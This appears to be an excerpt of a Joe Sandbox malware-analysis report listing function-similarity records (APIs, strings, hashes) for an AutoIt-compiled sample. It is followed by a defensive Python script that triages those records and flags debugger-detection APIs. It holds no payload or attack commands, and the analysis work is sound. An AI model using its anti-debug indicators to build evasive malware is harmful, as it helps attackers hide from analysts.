                                                                        • Part of subcall function 00C03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C03CCA
                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C01C46
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 624084870-1403004172
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: 3, 3, 16, 1
                                                                      • API String ID: 176396367-3042988571
                                                                      • Opcode ID: 7647b379bdf81c8e697a12c3ca45a3963484305817183a91d74d873492be5428
                                                                      • Instruction ID: c7b9243e2adfc6af99938ebea4e0ee49202cef8efdca019843c726be3936bd17
                                                                      • Opcode Fuzzy Hash: 7647b379bdf81c8e697a12c3ca45a3963484305817183a91d74d873492be5428
                                                                      • Instruction Fuzzy Hash: 3FE02B026043301492313279BCC1EBF56C9CFC5750710193FF981C2266EBE48F9193A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BDCE40: GetEnvironmentStringsW.KERNEL32 ref: 00BDCE44
                                                                      • _free.LIBCMT ref: 00BD1AFD
                                                                      • _free.LIBCMT ref: 00BD1B04
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _free$EnvironmentStrings
                                                                      • String ID: 8X
                                                                      • API String ID: 3523873077-771344844
                                                                      • Opcode ID: 229de4be6cf3a88769c205c14baae5e49541de67a547a4a38dd74de60ddaf7d2
                                                                      • Instruction ID: f4d1f2cc9c3b829daf1ce7b2466e4df2820c493058e317f7d2715cc8f2de603c
                                                                      • Opcode Fuzzy Hash: 229de4be6cf3a88769c205c14baae5e49541de67a547a4a38dd74de60ddaf7d2
                                                                      • Instruction Fuzzy Hash: EFE02B5360AA1161977272BF7C51B5E46C8ABD1330F6106E7F524D73C2FD64C8021295
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID: AutoIt$Error allocating memory.
                                                                      • API String ID: 2030045667-4017498283
                                                                      • Opcode ID: 4819051df4b1ddf03a7c50dfa7eb9a30cd9a6f464e7c020b8c8037aec432ede2
                                                                      • Instruction ID: 6b7efd2867d24e7e0fc66eb5d9d9009adb9a2651acf4ae5d659d6d10c8588070
                                                                      • Opcode Fuzzy Hash: 4819051df4b1ddf03a7c50dfa7eb9a30cd9a6f464e7c020b8c8037aec432ede2
                                                                      • Instruction Fuzzy Hash: 84E0483125431927D21436547C43FED7BC49F05B61F21047AFB58655C38BD1655047A9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BBF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00BC0D71,?,?,?,00BA100A), ref: 00BBF7CE
                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,00BA100A), ref: 00BC0D75
                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BA100A), ref: 00BC0D84
                                                                      Strings
                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00BC0D7F
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                      • API String ID: 55579361-631824599
                                                                      • Opcode ID: 541eec3c3950a83c81ee5518417edf0fe9e4b95f159b90501e4ec7371066d90f
                                                                      • Instruction ID: 3f3d939859c9e541355aa851f0ef6552f2f7acc597836e14a7594ce26eb2f39e
                                                                      • Opcode Fuzzy Hash: 541eec3c3950a83c81ee5518417edf0fe9e4b95f159b90501e4ec7371066d90f
                                                                      • Instruction Fuzzy Hash: CDE06DB02203118BD730AFBDE84475A7BE0AB00740F0089BDE896C6661DBF5E4448BA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: LocalTime
                                                                      • String ID: %.3d$X64
                                                                      • API String ID: 481472006-1077770165
                                                                      • Opcode ID: 501e193ee9940360151444d70f1f187a586631cd98d19956c7087a0082a23585
                                                                      • Instruction ID: 39d7f991d3fa1c72ab7a9e2ec73536ded05fc7f78a6081a77cf8b06611b30a76
                                                                      • Opcode Fuzzy Hash: 501e193ee9940360151444d70f1f187a586631cd98d19956c7087a0082a23585
                                                                      • Instruction Fuzzy Hash: B7D0127180810DEACB5097D0CCC59FEB3FDAB08301F5084E2FA06A3040E624C50C6BA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FindWindowW.USER32 ref: 00C3236C
                                                                      • PostMessageW.USER32 ref: 00C32373
                                                                        • Part of subcall function 00C0E97B: Sleep.KERNEL32 ref: 00C0E9F3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: FindMessagePostSleepWindow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 529655941-2988720461
                                                                      • Opcode ID: 5108869078f9d821c55c8537865b52da60160ed0a42f64802545de3b3327d572
                                                                      • Instruction ID: b9a5f651eb69dffafe87c400f04e90e2724db9ab1dfbe699f25054df89c3ee5a
                                                                      • Opcode Fuzzy Hash: 5108869078f9d821c55c8537865b52da60160ed0a42f64802545de3b3327d572
                                                                      • Instruction Fuzzy Hash: 5BD0C9323D53107AE664A771AC8FFCE76149B05B10F0049167745BA1D0C9A0A841DB54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FindWindowW.USER32 ref: 00C3232C
                                                                      • PostMessageW.USER32 ref: 00C3233F
                                                                        • Part of subcall function 00C0E97B: Sleep.KERNEL32 ref: 00C0E9F3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: FindMessagePostSleepWindow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 529655941-2988720461
                                                                      • Opcode ID: 1a78efdd52cefcc43d6ac2f82a909c1db27113e250340b4ce72f5ef73e865d0d
                                                                      • Instruction ID: 9ce6da295f598b66a6f4c871d70598bb01ab8ef8654c614993856eb377c0622f
                                                                      • Opcode Fuzzy Hash: 1a78efdd52cefcc43d6ac2f82a909c1db27113e250340b4ce72f5ef73e865d0d
                                                                      • Instruction Fuzzy Hash: 6FD0C9363A4310B6E664A771AC8FFCE7A149B00B10F0049167745BA1D0C9A0A841DB54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
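The records above are Joe Sandbox function-similarity entries for the AutoIt-compiled stage (process 3, image base 00BA0000): each lists the Win32 APIs and strings a function references, plus opcode and instruction hashes. Reading hundreds of them by hand is slow, and several are compiler or runtime boilerplate rather than malware logic. The Python below is an added example, not Joe Sandbox code and not part of this report; it parses that plain-text layout and attaches a coarse label to each function. The labels, the DEBUG_APIS set and the sample records are assumptions constructed for the example. Two caveats it encodes: the IsDebuggerPresent/OutputDebugStringW pair that sits next to the "CAtlBaseModule" string is ATL's module-initialisation error path, not an evasion check; and the FindWindowW("Shell_TrayWnd")/PostMessageW functions are tagged only as Explorer taskbar messaging, without attributing them to a specific AutoIt runtime routine.

```python
"""Triage helper for Joe Sandbox function-similarity records (added example;
not Joe Sandbox code). It parses the plain-text layout used above (APIs /
Strings / Similarity / Uniqueness blocks) and tags each function with a
coarse, heuristic label so runtime boilerplate can be skipped in IDA."""
import re
from dataclasses import dataclass, field

_END = re.compile(r"^Uniqueness Score:\s*(-?[\d.]+)%")       # record terminator
_API = re.compile(r"([A-Za-z_][A-Za-z0-9_]*)\.([A-Z0-9]+)")  # Name.MODULE
_KV = re.compile(r"^•\s*([^:]+):\s*(.*)$")                    # "• Key: value"
_SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness"}
# Assumed set of debugger-detection APIs. OutputDebugString is included because
# some loaders use it as a presence probe; in ATL init it is plain error output.
DEBUG_APIS = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent",
              "NtQueryInformationProcess", "OutputDebugStringW", "OutputDebugStringA"}

@dataclass
class FunctionRecord:
    direct_apis: list = field(default_factory=list)   # called by this function
    subcall_apis: list = field(default_factory=list)  # reached through subcalls
    strings: list = field(default_factory=list)
    similarity: dict = field(default_factory=dict)
    uniqueness: float = 0.0

def parse_records(text):
    """One FunctionRecord per block ending in a 'Uniqueness Score' line."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        end = _END.match(line)
        if end:
            cur.uniqueness = float(end.group(1))
            records.append(cur)
            cur, section = FunctionRecord(), None
            continue
        if line in _SECTIONS:
            section = line
            continue
        if section == "APIs":
            api = _API.search(line)
            if api:  # "Part of subcall function" lines are indirect calls
                bucket = cur.subcall_apis if "Part of subcall" in line else cur.direct_apis
                bucket.append(api.group(1))
        elif section == "Strings":
            cur.strings.append(line.lstrip("• ").split(", xrefs:")[0])
        elif section == "Similarity":
            kv = _KV.match(line)
            if kv:
                cur.similarity[kv.group(1).strip()] = kv.group(2).strip()
    return records

def classify(rec):
    """Heuristic label for one record; review anything not tagged boilerplate."""
    apis = set(rec.direct_apis)
    sim_strings = rec.similarity.get("String ID", "")
    if apis & DEBUG_APIS:
        # ATL's CAtlBaseModule constructor calls IsDebuggerPresent only to decide
        # whether to print its own error text: library init, not evasion.
        if "CAtlBaseModule" in sim_strings or any("CAtlBaseModule" in s for s in rec.strings):
            return "atl-init-boilerplate"
        return "possible-anti-debug"
    if {"FindWindowW", "PostMessageW"} <= apis and "Shell_TrayWnd" in sim_strings:
        return "explorer-taskbar-message"  # posts to Explorer's taskbar window
    if "AutoIt" in sim_strings:
        return "autoit-runtime"
    return "unclassified"

def triage(text):
    """Map each label to the Opcode IDs of the records that received it."""
    out = {}
    for rec in parse_records(text):
        out.setdefault(classify(rec), []).append(rec.similarity.get("Opcode ID", "?"))
    return out

# Constructed sample: three records condensed from the report layout above.
SAMPLE = """\
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,00BA100A), ref: 00BC0D75
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule), ref: 00BC0D84
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00BC0D7F
Similarity
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• Opcode ID: 541eec3c3950a83c81ee5518417edf0fe9e4b95f159b90501e4ec7371066d90f
Uniqueness Score: -1.00%
APIs
• FindWindowW.USER32 ref: 00C3236C
• PostMessageW.USER32 ref: 00C32373
  • Part of subcall function 00C0E97B: Sleep.KERNEL32 ref: 00C0E9F3
Strings
Similarity
• String ID: Shell_TrayWnd
• Opcode ID: 5108869078f9d821c55c8537865b52da60160ed0a42f64802545de3b3327d572
Uniqueness Score: -1.00%
APIs
Similarity
• String ID: AutoIt$Error allocating memory.
• Opcode ID: 4819051df4b1ddf03a7c50dfa7eb9a30cd9a6f464e7c020b8c8037aec432ede2
Uniqueness Score: -1.00%
"""
```

Run `triage(SAMPLE)` (or paste the report's own text in place of the constructed sample) to get a label-to-Opcode-ID map; the "possible-anti-debug" and "unclassified" buckets are the ones worth opening in the disassembler, while the boilerplate buckets can be skipped. Because the Opcode ID is a content hash, the same map also de-duplicates functions that the report lists more than once.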